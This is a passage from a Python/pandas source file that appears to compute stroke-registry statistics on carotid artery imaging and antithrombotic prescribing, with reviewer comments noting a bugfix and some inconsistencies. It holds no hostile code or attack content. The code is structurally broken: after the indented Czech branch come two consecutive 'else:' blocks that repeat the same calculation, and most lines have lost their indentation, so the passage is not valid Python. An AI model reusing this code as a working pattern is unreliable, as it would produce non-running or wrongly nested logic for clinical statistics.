        lambda x, c=count_column: round((x[c] / x['afib_not_detected_or_not_known_patients']) * 100, 2)
        if x['afib_not_detected_or_not_known_patients'] > 0 else 0,
        axis=1)
############################
# CAROTID ARTERIES IMAGING #
############################
if country_code == 'CZ':
    # NOTE(review): the three 2019 period branches below were byte-identical
    # copies differing only in the date window, so the computation is factored
    # into one local helper.  A stray debug `print(period)` was also removed
    # here — it referenced bare `period` while every sibling condition uses
    # `self.period`, so it looked like a leftover (and a potential NameError).

    def _cz_carotid_imaging_stats(date1, date2):
        """Compute the carotid-arteries-imaging columns on CZ data restricted
        to the [date1, date2] window, mutating self.statsDf / self.tmp in
        place (matching the surrounding code's style).

        Presumably the window exists because the question was only added to
        the CZ form mid-2019 — TODO confirm against the form history.
        """
        obj = FilterDataset(df=self.raw_data, country='CZ', date1=date1, date2=date2)
        cz_df = obj.fdf.copy()
        # Restrict to the sites present in the current stats table.
        site_ids = self.statsDf['Protocol ID'].tolist()
        cz_df = cz_df.loc[cz_df['Protocol ID'].isin(site_ids)].copy()
        if (country):
            # Duplicate all rows under the country name so a country-level
            # aggregate row is produced alongside the per-site rows.
            country_df = cz_df.copy()
            country_df['Protocol ID'] = country_df['Country']
            country_df['Site Name'] = country_df['Country']
            cz_df = pd.concat([cz_df, country_df])
            del country_df
        # Ischemic (1) and TIA (3) patients only.
        cz_df_is_tia = cz_df.loc[cz_df['STROKE_TYPE'].isin([1,3])].copy()
        self.statsDf['cz_df_is_tia_pts'] = self._count_patients(dataframe=cz_df_is_tia)
        self.tmp = cz_df_is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
        # 'Not known' (3) is taken over all patients; 'Yes' (1) and 'No' (2)
        # are taken over patients excluding the 'Not known' answers.
        self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
        self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['cz_df_is_tia_pts']) * 100), 2) if x['cz_df_is_tia_pts'] > 0 else 0, axis=1)
        self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
        self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
        self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
        self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['cz_df_is_tia_pts'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)

    if (not comparison and self.period.startswith('Q1') and self.period.endswith('2019')):
        # No data for this question in Q1/2019 — report all columns as N/A.
        for imaging_answer in ('Not known', 'Yes', 'No'):
            self.statsDf.loc[:, '# carotid arteries imaging - ' + imaging_answer] = 'N/A'
            self.statsDf.loc[:, '% carotid arteries imaging - ' + imaging_answer] = 'N/A'
    elif (not comparison and (self.period.startswith('March_Oct') and self.period.endswith('2019'))):
        _cz_carotid_imaging_stats(date(2019, 10, 1), date(2019, 10, 31))
    elif (not comparison and (self.period.startswith('Q2') or self.period.startswith('H1')) and self.period.endswith('2019')):
        _cz_carotid_imaging_stats(date(2019, 7, 19), date(2019, 8, 31))
    elif (not comparison and self.period == '2019'):
        _cz_carotid_imaging_stats(date(2019, 7, 19), date(2019, 12, 31))
else:
self.tmp = is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
if 'cz_df_is_tia_pts' in self.statsDf.columns:
self.statsDf.drop(['cz_df_is_tia_pts'], inplace=True, axis=1)
else:
# Fallback path of the outer branch: carotid arteries imaging statistics
# over the standard IS/TIA cohort (same formulas as the CZ branches, with
# 'is_tia_patients' as the base denominator).
self.tmp = is_tia.groupby(['Protocol ID', 'CAROTID_ARTERIES_IMAGING']).size().to_frame('count').reset_index()
# Value 3 = "Not known": percentage over all IS/TIA patients.
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=3, new_column_name='# carotid arteries imaging - Not known')
self.statsDf['% carotid arteries imaging - Not known'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Not known']/x['is_tia_patients']) * 100), 2) if x['is_tia_patients'] > 0 else 0, axis=1)
# Yes/No percentages exclude "Not known" from the denominator.
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=1, new_column_name='# carotid arteries imaging - Yes')
self.statsDf['% carotid arteries imaging - Yes'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - Yes']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CAROTID_ARTERIES_IMAGING", value=2, new_column_name='# carotid arteries imaging - No')
self.statsDf['% carotid arteries imaging - No'] = self.statsDf.apply(lambda x: round(((x['# carotid arteries imaging - No']/(x['is_tia_patients'] - x['# carotid arteries imaging - Not known'])) * 100), 2) if (x['is_tia_patients'] - x['# carotid arteries imaging - Not known']) > 0 else 0, axis=1)
############################
# ANTITHROMBOTICS WITH CVT #
############################
# Antithrombotic prescription statistics over the IS/TIA/CVT cohort.
# Percentages are computed over patients alive at discharge
# (DISCHARGE_DESTINATION == 5 marks dead patients, excluded from denominators).
# Create dataframe with dead patients excluded
antithrombotics_with_cvt = is_tia_cvt[~is_tia_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['antithrombotics_patients_with_cvt'] = self._count_patients(dataframe=antithrombotics_with_cvt)
ischemic_transient_cerebral_dead = is_tia_cvt[is_tia_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['ischemic_transient_cerebral_dead_patients'] = self._count_patients(dataframe=ischemic_transient_cerebral_dead)
self.tmp = antithrombotics_with_cvt.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
del antithrombotics_with_cvt, ischemic_transient_cerebral_dead
# ANTITHROMBOTICS values 1-8 = drug classes, 9 = recommended but not
# prescribed, 10 = neither prescribed nor recommended.
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients receiving antiplatelets with CVT')
self.statsDf['% patients receiving antiplatelets with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving antiplatelets with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=2, new_column_name='# patients receiving Vit. K antagonist with CVT')
self.statsDf['% patients receiving Vit. K antagonist with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=3, new_column_name='# patients receiving dabigatran with CVT')
self.statsDf['% patients receiving dabigatran with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving dabigatran with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=4, new_column_name='# patients receiving rivaroxaban with CVT')
self.statsDf['% patients receiving rivaroxaban with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving rivaroxaban with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=5, new_column_name='# patients receiving apixaban with CVT')
self.statsDf['% patients receiving apixaban with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving apixaban with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=6, new_column_name='# patients receiving edoxaban with CVT')
self.statsDf['% patients receiving edoxaban with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving edoxaban with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=7, new_column_name='# patients receiving LMWH or heparin in prophylactic dose with CVT')
self.statsDf['% patients receiving LMWH or heparin in prophylactic dose with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in prophylactic dose with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=8, new_column_name='# patients receiving LMWH or heparin in full anticoagulant dose with CVT')
self.statsDf['% patients receiving LMWH or heparin in full anticoagulant dose with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in full anticoagulant dose with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=9, new_column_name='# patients not prescribed antithrombotics, but recommended with CVT')
self.statsDf['% patients not prescribed antithrombotics, but recommended with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients not prescribed antithrombotics, but recommended with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=10, new_column_name='# patients neither receiving antithrombotics nor recommended with CVT')
self.statsDf['% patients neither receiving antithrombotics nor recommended with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients neither receiving antithrombotics nor recommended with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
## ANTITHROMBOTICS - PATIENTS PRESCRIBED + RECOMMENDED
# "Prescribed" = sum of the eight drug-class counts (values 1-8).
self.statsDf.loc[:, '# patients prescribed antithrombotics with CVT'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets with CVT'] + x['# patients receiving Vit. K antagonist with CVT'] + x['# patients receiving dabigatran with CVT'] + x['# patients receiving rivaroxaban with CVT'] + x['# patients receiving apixaban with CVT'] + x['# patients receiving edoxaban with CVT'] + x['# patients receiving LMWH or heparin in prophylactic dose with CVT'] + x['# patients receiving LMWH or heparin in full anticoagulant dose with CVT'], axis=1)
# self.statsDf['% patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended']) > 0 else 0, axis=1)
self.statsDf['% patients prescribed antithrombotics with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics with CVT']/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients']) > 0 else 0, axis=1)
self.statsDf.loc[:, '# patients prescribed or recommended antithrombotics with CVT'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets with CVT'] + x['# patients receiving Vit. K antagonist with CVT'] + x['# patients receiving dabigatran with CVT'] + x['# patients receiving rivaroxaban with CVT'] + x['# patients receiving apixaban with CVT'] + x['# patients receiving edoxaban with CVT'] + x['# patients receiving LMWH or heparin in prophylactic dose with CVT'] + x['# patients receiving LMWH or heparin in full anticoagulant dose with CVT'] + x['# patients not prescribed antithrombotics, but recommended with CVT'], axis=1)
# NOTE(review): the numerator below subtracts the dead-patient count from the
# prescribed-or-recommended total, while the analogous no-CVT section (further
# down) subtracts only the dead patients who were prescribed. Looks
# inconsistent — confirm which subtraction is intended.
self.statsDf['% patients prescribed or recommended antithrombotics with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed or recommended antithrombotics with CVT'] - x['ischemic_transient_cerebral_dead_patients'])/(x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended with CVT'])) * 100, 2) if ((x['is_tia_cvt_patients'] - x['ischemic_transient_cerebral_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended with CVT']) > 0) else 0, axis=1)
self.statsDf.fillna(0, inplace=True)
###########################################
# ANTIPLATELETS - PRESCRIBED WITHOUT AFIB #
###########################################
# CVT cohort, patients with aFib/flutter not detected or not known
# (AFIB_FLUTTER values 4, 5): share of them prescribed antiplatelets
# (ANTITHROMBOTICS == 1), dead patients excluded from both sides.
afib_flutter_not_detected_or_not_known_with_cvt = is_tia_cvt[is_tia_cvt['AFIB_FLUTTER'].isin([4, 5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known_with_cvt)
afib_flutter_not_detected_or_not_known_with_cvt_dead = afib_flutter_not_detected_or_not_known_with_cvt[afib_flutter_not_detected_or_not_known_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_not_detected_or_not_known_dead_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_not_detected_or_not_known_with_cvt_dead)
prescribed_antiplatelets_no_afib_with_cvt = afib_flutter_not_detected_or_not_known_with_cvt[afib_flutter_not_detected_or_not_known_with_cvt['ANTITHROMBOTICS'].isin([1])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_patients_with_cvt'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib_with_cvt)
prescribed_antiplatelets_no_afib_dead_with_cvt = prescribed_antiplatelets_no_afib_with_cvt[prescribed_antiplatelets_no_afib_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['prescribed_antiplatelets_no_afib_dead_patients_with_cvt'] = self._count_patients(dataframe=prescribed_antiplatelets_no_afib_dead_with_cvt)
self.tmp = afib_flutter_not_detected_or_not_known_with_cvt.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients prescribed antiplatelets without aFib with CVT')
# Numerator: prescribed minus prescribed-and-dead; denominator: cohort minus dead.
self.statsDf['% patients prescribed antiplatelets without aFib with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antiplatelets without aFib with CVT'] - x['prescribed_antiplatelets_no_afib_dead_patients_with_cvt'])/(x['afib_flutter_not_detected_or_not_known_patients_with_cvt'] - x['afib_flutter_not_detected_or_not_known_dead_patients_with_cvt'])) * 100, 2) if ((x['afib_flutter_not_detected_or_not_known_patients_with_cvt'] - x['afib_flutter_not_detected_or_not_known_dead_patients_with_cvt']) > 0) else 0, axis=1)
del afib_flutter_not_detected_or_not_known_with_cvt, afib_flutter_not_detected_or_not_known_with_cvt_dead, prescribed_antiplatelets_no_afib_with_cvt, prescribed_antiplatelets_no_afib_dead_with_cvt
#########################################
# ANTICOAGULANTS - PRESCRIBED WITH AFIB #
#########################################
# CVT cohort, patients with detected aFib/flutter (AFIB_FLUTTER 1-3):
# share prescribed anticoagulants, i.e. any antithrombotic that is not
# antiplatelets (1), not "recommended only" (9) and not "none" (10),
# dead patients excluded.
afib_flutter_detected_with_cvt = is_tia_cvt[is_tia_cvt['AFIB_FLUTTER'].isin([1, 2, 3])].copy()
self.statsDf['afib_flutter_detected_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_detected_with_cvt)
anticoagulants_prescribed_with_cvt = afib_flutter_detected_with_cvt[~afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([1, 10, 9]) & ~afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['# patients prescribed anticoagulants with aFib with CVT'] = self._count_patients(dataframe=anticoagulants_prescribed_with_cvt)
anticoagulants_recommended_with_cvt = afib_flutter_detected_with_cvt[afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([9])].copy()
self.statsDf['anticoagulants_recommended_patients_with_cvt'] = self._count_patients(dataframe=anticoagulants_recommended_with_cvt)
# NOTE(review): variable name is missing the '_cvt' suffix used by its
# siblings; it is referenced again in the del below, so renaming must be
# done in both places at once.
afib_flutter_detected_dead_with = afib_flutter_detected_with_cvt[afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['afib_flutter_detected_dead_patients_with_cvt'] = self._count_patients(dataframe=afib_flutter_detected_dead_with)
self.statsDf['% patients prescribed anticoagulants with aFib with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed anticoagulants with aFib with CVT']/(x['afib_flutter_detected_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt'])) * 100), 2) if (x['afib_flutter_detected_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt']) > 0 else 0, axis=1)
##########################################
# ANTITHROMBOTICS - PRESCRIBED WITH AFIB #
##########################################
# CVT cohort, patients with detected aFib/flutter: share prescribed any
# antithrombotic (not "recommended only" = 9, not "none" = 10), with dead
# patients (DISCHARGE_DESTINATION == 5) and alive recommended-only patients
# excluded from the denominator.
antithrombotics_prescribed_with_cvt = afib_flutter_detected_with_cvt[~afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([9, 10]) & ~afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['# patients prescribed antithrombotics with aFib with CVT'] = self._count_patients(dataframe=antithrombotics_prescribed_with_cvt)
recommended_antithrombotics_with_afib_alive_with_cvt = afib_flutter_detected_with_cvt[afib_flutter_detected_with_cvt['ANTITHROMBOTICS'].isin([9]) & ~afib_flutter_detected_with_cvt['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['recommended_antithrombotics_with_afib_alive_patients_with_cvt'] = self._count_patients(dataframe=recommended_antithrombotics_with_afib_alive_with_cvt)
# BUGFIX: the zero-division guard previously started with
# x['afib_flutter_detected_dead_patients_with_cvt'] (the DEAD count) instead of
# x['afib_flutter_detected_patients_with_cvt'] (the DETECTED count), i.e. it
# evaluated dead - dead - recommended, which is never > 0, so this percentage
# was always reported as 0. The guard now mirrors the division's denominator,
# consistent with every other percentage computation in this method.
self.statsDf['% patients prescribed antithrombotics with aFib with CVT'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics with aFib with CVT']/(x['afib_flutter_detected_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt'] - x['recommended_antithrombotics_with_afib_alive_patients_with_cvt'])) * 100), 2) if (x['afib_flutter_detected_patients_with_cvt'] - x['afib_flutter_detected_dead_patients_with_cvt'] - x['recommended_antithrombotics_with_afib_alive_patients_with_cvt']) > 0 else 0, axis=1)
# Release the intermediate dataframes from this and the previous section.
del afib_flutter_detected_with_cvt, anticoagulants_prescribed_with_cvt, anticoagulants_recommended_with_cvt, afib_flutter_detected_dead_with, antithrombotics_prescribed_with_cvt, recommended_antithrombotics_with_afib_alive_with_cvt
###############################
# ANTITHROMBOTICS WITHOUT CVT #
###############################
# Same antithrombotic statistics as the CVT section above, but over the
# IS/TIA-only cohort ('is_tia'). Only values 1, 9 and 10 get their own
# percentage columns; the other drug-class counts (2-8) feed the
# prescribed / prescribed-or-recommended sums and are dropped afterwards.
antithrombotics = is_tia[~is_tia['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['antithrombotics_patients'] = self._count_patients(dataframe=antithrombotics)
ischemic_transient_dead = is_tia[is_tia['DISCHARGE_DESTINATION'].isin([5])].copy()
self.statsDf['ischemic_transient_dead_patients'] = self._count_patients(dataframe=ischemic_transient_dead)
del ischemic_transient_dead
# Dead patients who had antithrombotics prescribed (i.e. not value 10);
# used to correct the prescribed-or-recommended numerator below.
ischemic_transient_dead_prescribed = is_tia[is_tia['DISCHARGE_DESTINATION'].isin([5]) & ~is_tia['ANTITHROMBOTICS'].isin([10])].copy()
self.statsDf['ischemic_transient_dead_patients_prescribed'] = self._count_patients(dataframe=ischemic_transient_dead_prescribed)
del ischemic_transient_dead_prescribed
self.tmp = antithrombotics.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# patients receiving antiplatelets')
self.statsDf['% patients receiving antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# patients receiving antiplatelets']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=2, new_column_name='# patients receiving Vit. K antagonist')
# self.statsDf['% patients receiving Vit. K antagonist'] = self.statsDf.apply(lambda x: round(((x['# patients receiving Vit. K antagonist']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=3, new_column_name='# patients receiving dabigatran')
# self.statsDf['% patients receiving dabigatran'] = self.statsDf.apply(lambda x: round(((x['# patients receiving dabigatran']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=4, new_column_name='# patients receiving rivaroxaban')
# self.statsDf['% patients receiving rivaroxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving rivaroxaban']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=5, new_column_name='# patients receiving apixaban')
# self.statsDf['% patients receiving apixaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving apixaban']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=6, new_column_name='# patients receiving edoxaban')
# self.statsDf['% patients receiving edoxaban'] = self.statsDf.apply(lambda x: round(((x['# patients receiving edoxaban']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=7, new_column_name='# patients receiving LMWH or heparin in prophylactic dose')
# self.statsDf['% patients receiving LMWH or heparin in prophylactic dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in prophylactic dose']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=8, new_column_name='# patients receiving LMWH or heparin in full anticoagulant dose')
# self.statsDf['% patients receiving LMWH or heparin in full anticoagulant dose'] = self.statsDf.apply(lambda x: round(((x['# patients receiving LMWH or heparin in full anticoagulant dose']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=9, new_column_name='# patients not prescribed antithrombotics, but recommended')
self.statsDf['% patients not prescribed antithrombotics, but recommended'] = self.statsDf.apply(lambda x: round(((x['# patients not prescribed antithrombotics, but recommended']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=10, new_column_name='# patients neither receiving antithrombotics nor recommended')
self.statsDf['% patients neither receiving antithrombotics nor recommended'] = self.statsDf.apply(lambda x: round(((x['# patients neither receiving antithrombotics nor recommended']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
## ANTITHROMBOTICS - PATIENTS PRESCRIBED + RECOMMENDED
# "Prescribed" = sum of the eight drug-class counts (values 1-8).
self.statsDf.loc[:, '# patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets'] + x['# patients receiving Vit. K antagonist'] + x['# patients receiving dabigatran'] + x['# patients receiving rivaroxaban'] + x['# patients receiving apixaban'] + x['# patients receiving edoxaban'] + x['# patients receiving LMWH or heparin in prophylactic dose'] + x['# patients receiving LMWH or heparin in full anticoagulant dose'], axis=1)
# self.statsDf['% patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics']/(x['is_tia_cvt_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended'])) * 100), 2) if (x['is_tia_cvt_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended']) > 0 else 0, axis=1)
self.statsDf['% patients prescribed antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed antithrombotics']/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100), 2) if (x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0 else 0, axis=1)
self.statsDf.loc[:, '# patients prescribed or recommended antithrombotics'] = self.statsDf.apply(lambda x: x['# patients receiving antiplatelets'] + x['# patients receiving Vit. K antagonist'] + x['# patients receiving dabigatran'] + x['# patients receiving rivaroxaban'] + x['# patients receiving apixaban'] + x['# patients receiving edoxaban'] + x['# patients receiving LMWH or heparin in prophylactic dose'] + x['# patients receiving LMWH or heparin in full anticoagulant dose'] + x['# patients not prescribed antithrombotics, but recommended'], axis=1)
# From patients prescribed or recommended antithrombotics remove patient who had prescribed antithrombotics and were dead (nominator)
# self.statsDf['% patients prescribed or recommended antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed or recommended antithrombotics'] - x['ischemic_transient_dead_patients_prescribed'])/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended'])) * 100, 2) if ((x['is_tia_patients'] - x['ischemic_transient_dead_patients'] - x['# patients not prescribed antithrombotics, but recommended']) > 0) else 0, axis=1)
self.statsDf['% patients prescribed or recommended antithrombotics'] = self.statsDf.apply(lambda x: round(((x['# patients prescribed or recommended antithrombotics'] - x['ischemic_transient_dead_patients_prescribed'])/(x['is_tia_patients'] - x['ischemic_transient_dead_patients'])) * 100, 2) if ((x['is_tia_patients'] - x['ischemic_transient_dead_patients']) > 0) else 0, axis=1)
